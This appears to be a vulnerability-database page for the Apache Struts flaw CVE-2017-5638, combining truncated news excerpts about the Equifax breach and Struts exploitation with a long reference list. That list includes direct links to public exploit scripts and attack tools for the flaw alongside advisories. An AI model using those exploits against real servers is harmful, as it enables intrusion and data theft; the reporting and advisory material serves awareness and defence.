Commissioner John Koskinen, discussing whether the breach would interfere with tax collection, told journalists “a significant percent of those taxpayers already had their information in the hands of criminals”, according to a report of ...

Oracle Patches 250 Bugs in Quarterly Critical Patch Update
Threatpost • Tom Spring • 17 Oct 2017

Oracle patched 250 vulnerabilities across hundreds of different products as part of its quarterly Critical Patch Update released today.
Rounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.
Of the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle’s popular Oracle E-Business Suite (EBS).
“W...

Sole Equifax security worker at fault for failed patch, says former CEO
The Register • Simon Sharwood • 04 Oct 2017

Someone failed to order the patch. If it was you, c'mere, have a hug. And a new identity

Recently-and-forcibly-retired Equifax CEO Rick Smith has laid the blame for his credit-check biz's IT security breach on a single member of the company's security team.
In testimony on Tuesday before a US House subcommittee on consumer protection, Smith explained that Equifax has a protocol whereby news of important software patches is communicated to the appropriate people within a certain time. When details of security vulnerability CVE-2017-5638 landed in March 2017, bearing bad news ab...

Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies
Threatpost • Chris Brook • 03 Oct 2017

Equifax, the credit agency behind this summer’s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.
Paulino do Rego Barros, Jr., the company’s interim CEO, announced Monday that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.
Equifax initially called its investigation around the breach “substantially complete,” but said it was still carrying out furth...

Equifax couldn't find or patch vulnerable Struts implementations
The Register • Richard Chirgwin • 02 Oct 2017

Ex-CEO says company stayed silent about hack to stop crims piling on with more attacks

Equifax was just as much of a trash-fire as it looked: the company saw the Apache Struts 2 vulnerability warning, failed to patch its systems, and held back a public announcement for weeks for fear of “copycat” attacks.
Those Infosec for Absolute Dummies tips were made official by ex-CEO Richard Smith, by way of evidence published by a US House committee ahead of his in-person appearance Tuesday.
Smith's written statement [PDF] to the House Committee on Energy and Commerce says t...

Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug
Threatpost • Chris Brook • 26 Sep 2017

Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.
The Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, earlier this month.
Scores of Oracle products, roughly two dozen in total, are aff...

Equifax's disastrous Struts patching blunder: THOUSANDS of other orgs did it too
The Register • John Leyden • 20 Sep 2017

Those are just the ones known to have downloaded outdated versions

Thousands of companies may be susceptible to the same type of hack that recently struck Equifax.
The Equifax breach was the result of a vulnerable Apache Struts component. Software automation vendor Sonatype warns that 3,054 organisations downloaded the same Struts2 component exploited in the Equifax hack in the last 12 months. The affected version of Struts2 was publicly disclosed as vulnerable (CVE-2017-5638) on March 10, and was subsequently exploited at Equifax between May and late Jul...

Equifax's IT leaders 'retire' as company says it knew about the bug that brought it down
The Register • Simon Sharwood, APAC Editor • 17 Sep 2017

Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.
The retirements and more details about the company's mega-breach are revealed in a new entry to equifaxsecurity2017.com in which the company describes what it knew, when it knew it, and how it responded.
The update reveals that the attack hit the company's “U.S. o...

Equifax Releases New Information About Security Breach as Top Execs Step Down
BleepingComputer • Catalin Cimpanu • 16 Sep 2017

In a press release published late Friday night, credit rating and reporting firm Equifax revealed new details about the security breach that
, and also announced the immediate retirement of two high-ranking executives.
Equifax says that breach came to light on July 29 when its security team observed suspicious traffic from its US online dispute portal. Its security team blocked the traffic, but the next day, July 30, more suspicious activity was discovered.
Realizing that some...

Equifax mega-breach: Security bod flags header config conflict
The Register • John Leyden • 15 Sep 2017

Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.
The finding from Helme comes as a date was confirmed for the Equifax CEO to appear before Congress earlier next month, and the FTC said it was investigating the credit reference agency.
“Many of the headers are more about addressing the basics, but as a site that...

Equifax Confirms March Struts Vulnerability Behind Breach
Threatpost • Chris Brook • 14 Sep 2017

Equifax said the culprit behind this summer’s massive breach of 143 million Americans was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.
The bug was widely assumed by experts to be the “U.S. website application vulnerability” implicated by the company last Thursday, especially after an Apache spokeswoman told Reuters on Friday that it appeared the consumer credit reporting agency hadn’t applied patches for flaws discovered earlier this year.
On We...

Missed patch caused Equifax data breach
The Register • Simon Sharwood, APAC Editor • 14 Sep 2017

Apache Struts was popped, but company had at least TWO MONTHS to fix it

Equifax has revealed that the cause of its massive data breach was a flaw it should have patched weeks before it was attacked.
The company has updated its www.equifaxsecurity2017.com/ site with a new “A Progress Update for Consumers” that opens as follows:
As the Apache Foundation pointed out earlier this week, it reported CVE-2017-5638 in March 2017. Doubt us? Here's the NIST notification that mentions it as being notified on March 10th.
Equifax was breached in “mid-May...

Equifax Confirms Hackers Used Apache Struts Vulnerability to Breach Its Servers
BleepingComputer • Catalin Cimpanu • 14 Sep 2017

In an update posted to its security breach website, Equifax said hackers used an Apache Struts security bug to breach its servers and later
, from both the US and the UK. We quote:
Equifax's confirmation comes after
from equity research firm Baird circulated last week blaming the same flaw.
At the time it was discovered, in March 2017, the Apache Struts CVE-2017-5638 vulnerability
— a term used to describe security bugs exploited by attackers but which vendor...

Credit reference agencies faulted for poor patching
The Register • John Leyden • 13 Sep 2017

Hold our beers, Equifax

Updated Experian and Annual Credit Report.com – an organization set up by Equifax, Experian and Transunion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year.
The security shortcoming raises important questions following the disclosure of a mega-breach at Equifax last week that affected data on 143 million Americans and an as-yet unknown number of Canadians and Brits. Equifax only said that an unspecified web ...

Apache Foundation Refutes Involvement in Equifax Breach
Threatpost • Chris Brook • 11 Sep 2017

A group of developers behind Apache Struts, believed by some to be the culprit behind last week’s Equifax breach, took umbrage with those claims over the weekend.
René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it’s unclear which vulnerability, if any was exploited.
The letter, which was written on behalf of the Struts PMC, was spurred by an internal analyst report...

Apache Struts Vulnerabilities May Affect Many of Cisco's Products
BleepingComputer • Catalin Cimpanu • 11 Sep 2017

Cisco has initiated a mass security audit of all its products that incorporate a version of the Apache Struts framework, recently affected by a series of vulnerabilities, one of which is under active exploitation.
Cisco engineers will test all the software products for four Apache Struts security bugs disclosed last week.
The company is keeping a list of To-Be-Tested, Vulnerable, and Confirmed Not Vulnerable products in two security advisories,
and
.
The first Ci...

Patch Released for Critical Apache Struts Bug
Threatpost • Tom Spring • 05 Sep 2017

The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.
All web applications using the framework’s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.
“This particular vulnerability allows a remote attacker t...

Ransomware Gang Made Over $100,000 by Exploiting Apache Struts Zero-Day
BleepingComputer • Catalin Cimpanu • 06 Apr 2017

For more than a month, at least ten groups of attackers have been compromising systems running applications built with Apache Struts and installing backdoors, DDoS bots, cryptocurrency miners, or ransomware, depending if the machine is running Linux or Windows.
For their attacks, the groups are using a zero-day, disclosed and immediately fixed last month by Apache.
The vulnerability, CVE-2017-5638, allows an attacker to execute commands on the server via content uploaded to the Jakart...

Attacks Heating Up Against Apache Struts 2 Vulnerability
Threatpost • Michael Mimoso • 09 Mar 2017

Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was patched and proof-of-concept exploit code was introduced into Metasploit.
The vulnerability, CVE-2017-5638, was already under attack in the wild prior to Monday’s disclosure, but since then, the situation has worsened and experts fear it’s going to linger for a while.
“The second someone starts working on a Me...

Apache Struts 2 needs patching, without delay. It's under attack now
The Register • Richard Chirgwin • 09 Mar 2017

Black hats testing remote code execution zero-day vulnerability

Infosec researchers have found a “dire” zero-day in Apache Struts 2, and it's under active attack.
If you're a sysadmin using the Jakarta-based file upload Multipart parser under Apache Struts 2, Nick Biasini of Cisco's Talos advises applying the latest upgrade immediately.
CVE-2017-5638 is documented at Rapid7's Metasploit Framework GitHub site.
Talos's input adds urgency to getting the upgrade, because the organisation “found a high number of exploitation events. The ma...

Apache Struts Zero-Day Exploited in the Wild
BleepingComputer • Catalin Cimpanu • 09 Mar 2017

Cisco's Talos security team announced it discovered attacks against a zero-day vulnerability in Apache Struts, which Apache
on Monday.
According to its website, "
is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON."
The vulnerability, CVE-2017-5638, allows an attacker to execute commands on the ...

References

CWE-20
https://isc.sans.edu/diary/22169
https://github.com/rapid7/metasploit-framework/issues/8064
https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228
https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519a
https://cwiki.apache.org/confluence/display/WW/S2-045
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
https://packetstormsecurity.com/files/141494/S2-45-poc.py.txt
https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html
https://github.com/mazen160/struts-pwn
https://exploit-db.com/exploits/41570
https://twitter.com/theog150/status/841146956135124993
https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/
http://www.securityfocus.com/bid/96729
http://www.eweek.com/security/apache-struts-vulnerability-under-attack.html
https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/
https://support.lenovo.com/us/en/product_security/len-14200
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03723en_us
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03733en_us
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03749en_us
http://www.securitytracker.com/id/1037973
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
https://www.exploit-db.com/exploits/41614/
https://www.symantec.com/security-center/network-protection-security-advisories/SA145
https://struts.apache.org/docs/s2-046.html
https://struts.apache.org/docs/s2-045.html
https://cwiki.apache.org/confluence/display/WW/S2-046
https://www.kb.cert.org/vuls/id/834067
https://security.netapp.com/advisory/ntap-20170310-0001/
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt
https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E
https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E
https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E
https://www.securityfocus.com/bid/96729
https://tools.cisco.com/security/center/viewAlert.x?alertId=52972
https://nvd.nist.gov
https://www.exploit-db.com/exploits/41570/
https://github.com/cafnet/apache-struts-v2-CVE-2017-5638
https://www.kb.cert.org/vuls/id/834067